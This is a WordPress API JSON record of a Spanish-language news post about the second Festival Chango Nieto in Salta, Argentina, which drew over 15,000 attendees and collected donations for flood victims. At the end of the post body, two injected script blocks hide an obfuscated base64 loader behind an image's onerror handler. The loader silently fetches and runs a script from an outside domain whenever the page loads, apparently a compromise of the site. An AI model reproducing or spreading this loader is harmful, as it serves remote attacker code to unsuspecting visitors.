{"id":5089,"date":"2025-04-24T08:49:49","date_gmt":"2025-04-24T11:49:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5089"},"modified":"2025-08-13T23:35:23","modified_gmt":"2025-08-14T02:35:23","slug":"la-musica-y-la-solidaridad-convocaron-a-mas-de-15-000-personas-en-el-festival-chango-nieto","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5089","title":{"rendered":"La m\u00fasica y la solidaridad convocaron a m\u00e1s de 15.000 personas en el Festival Chango Nieto"},"content":{"rendered":"\n<p><strong><em>En homenaje al cantautor salte\u00f1o Chango Nieto, anoche se desarroll\u00f3 el Segundo Festival que cont\u00f3 con una masiva participaci\u00f3n ciudadana.<\/em><\/strong><\/p>\n\n\n\n<p>La Secretar\u00eda de Cultura de la Provincia de Salta llev\u00f3 a cabo anoche,&nbsp;en el Paseo Ameghino, el 2\u00b0 Festival Chango Nieto, una jornada cultural que uni\u00f3 a la comunidad salte\u00f1a en torno a la m\u00fasica folkl\u00f3rica y la solidaridad.<\/p>\n\n\n\n<p>El evento, organizado conjuntamente con la Municipalidad de Salta, cont\u00f3 con una masiva participaci\u00f3n ciudadana. M\u00e1s de 15.000 personas asistieron a este homenaje p\u00fablico al cantautor salte\u00f1o Chango Nieto, nacido en el mes de abril, cuya obra art\u00edstica contin\u00faa siendo referente del cancionero popular argentino.<\/p>\n\n\n\n<p>Durante el festival, con entrada libre y gratuita, se presentaron artistas de reconocida trayectoria como Chaque\u00f1o Palavecino, Christian Herrera, Las Voces de Or\u00e1n, Colo Vasconcellos, Guitarreros, Cabales, Alma Carpera, Canto 4, Los Aimo, Marcela Ceballos, Paola Arias, Jacinta Condori, El Entrevero, Carla Nieto, Hern\u00e1n Nieto y Luna Nieto.<\/p>\n\n\n\n<p>El p\u00fablico asistente respondi\u00f3 con un alto grado de compromiso, acercando donaciones de alimentos no perecederos y ropa, destinadas a familias y merenderos de Santa Victoria Este, localidad recientemente afectada por inundaciones.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16988-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16988-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto.webp\" alt=\"La m\u00fasica y la solidaridad convocaron a m\u00e1s de 15.000 personas en el Festival Chango Nieto\"\/><\/a><\/figure>\n\n\n\n<p>La ministra de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda,&nbsp;<strong>Cristina Fiore<\/strong>,&nbsp;reconoci\u00f3 el legado folcl\u00f3rico del Chango Nieto y agradeci\u00f3 la presencia de los artistas que participaron en pos de la solidaridad que tiene como destinatario al norte salte\u00f1o.<\/p>\n\n\n\n<p>El secretario de Cultura,&nbsp;<strong>Diego Ashur M\u00e1s<\/strong>, dijo \u201ctermino una gran noche de m\u00fasica salte\u00f1a y con un fin solidario en honor al Chango nieto con la participaci\u00f3n de una enorme cantidad de artistas\u201d.<\/p>\n\n\n\n<p>Por su parte, las hijas del artista homenajeado,&nbsp;<strong>Carla<\/strong>&nbsp;y&nbsp;<strong>Luna Nieto<\/strong>, agradecieron la respuesta del p\u00fablico y manifestaron su emoci\u00f3n por la convocatoria y el sentido social del evento.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"5091\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11795-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-1024x576.webp\" alt=\"\" class=\"wp-image-5091\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11795-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11795-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11795-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11795-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11795-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11795-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"5090\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11797-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-1024x576.webp\" alt=\"\" class=\"wp-image-5090\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11797-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11797-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11797-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11797-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11797-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/11797-la-musica-y-la-solidaridad-convocaron-a-mas-de-15000-personas-en-el-festival-chango-nieto.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:\u00a0<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En homenaje al cantautor salte\u00f1o Chango Nieto, anoche se desarroll\u00f3 el Segundo Festival que cont\u00f3 con una masiva participaci\u00f3n ciudadana. La Secretar\u00eda de Cultura de la Provincia de Salta llev\u00f3 a cabo anoche,&nbsp;en el Paseo Ameghino, el 2\u00b0 Festival Chango Nieto, una jornada cultural que uni\u00f3 a la comunidad salte\u00f1a en torno a la m\u00fasica [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5092,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-5089","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5089"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5089"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5089\/revisions"}],"predecessor-version":[{"id":6511,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5089\/revisions\/6511"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5092"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5089"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5089"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5089"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}